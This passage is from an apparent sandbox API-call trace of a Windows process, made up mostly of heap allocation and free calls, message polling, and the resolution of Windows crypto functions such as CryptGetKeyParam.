hHeap=0x1780000) returned 1 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0122.219] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0122.219] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5c27) returned 0x49aa010 [0122.219] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.219] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.220] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.220] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5c27) returned 0x49b5870 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0122.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0122.221] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0122.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0122.221] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.221] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.221] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0122.222] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0122.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0122.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.222] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0122.222] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.222] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.223] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0122.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.224] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392688 [0122.224] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392688 | out: hHeap=0x1780000) returned 1 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0122.224] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0122.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0122.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0122.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f08 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0122.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0122.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.227] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0122.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0122.228] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0122.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: 